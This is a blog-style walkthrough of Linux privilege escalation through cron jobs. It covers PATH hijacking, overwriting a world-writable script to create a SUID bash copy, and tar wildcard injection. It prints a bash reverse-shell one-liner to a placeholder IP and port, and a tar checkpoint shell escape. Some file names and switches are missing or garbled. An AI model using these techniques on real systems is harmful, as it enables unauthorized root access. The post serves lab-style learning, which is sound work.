Linux PrivEsc 3: CronJobs

Cronjobs are tasks that run on a schedule. These can be abused in a number of situations such as absolute paths not being declared or weak permissions on the files that are being executed.

We can enumerate for cronjobs by reading the cron table – /etc/crontab or for individual users – /var/spool/cron/ or /var/spool/cron/crontabs/.

In this case we have 2 user defined jobs – one runing a file ( with no absolute path and another running /usr/local/bin/, both run as root every minute.

No Absolute Path

Using locate to find the file discovers the file located in /usr/local/bin, this directory is also on our path as the third location to check for the file.

If we have write permissions on a directory earlier in the path we can create a file with the same name there containing any contents that we like – in this case a simple bash script to spawn a reverse shell. Don’t forget to add executable permissions to the file.

/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1

The cronjob runs every minute, so setting up a listener and waiting for up to a minute will provide a shell as root.

Insecure Permissions

In this case the file /usr/local/bin/ has world writable permissions set, meaning we can edit the file.

We can abuse this in the same way as writing our own file, this time though I appended a line to copy bash into /tmp and set the SUID bit.

Once again, a short wait and the cronbash file appears in /tmp with SUID set, running this will grant a shell as root.


Taking a look at, we have no write or execute permissions, we can only read the file.

The file simply runs a script switching to /home/user then uses tar to compress the contents of /home/user to /tmp/backup.tar.gz by using a wildcard.

Checking for any shell escape methods using tar nets the following.

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

We can create files in /home/user named as the switches used in this command.

I created a bash script named containing the following payload, gave it executable permissions and created 2 files –checkpoint=1 & –

/bin/bash -i >& /dev/tcp/<IP address>/<port> 0>&1

This will essentially run the following command when the cronjob executes:

tar czf /tmp/backup.tar.gz --checkpoint=1 myvpn.ovpn tools

A short wait for the cronjob to execute and we are once again granted with a reverse shell as root.

%d bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close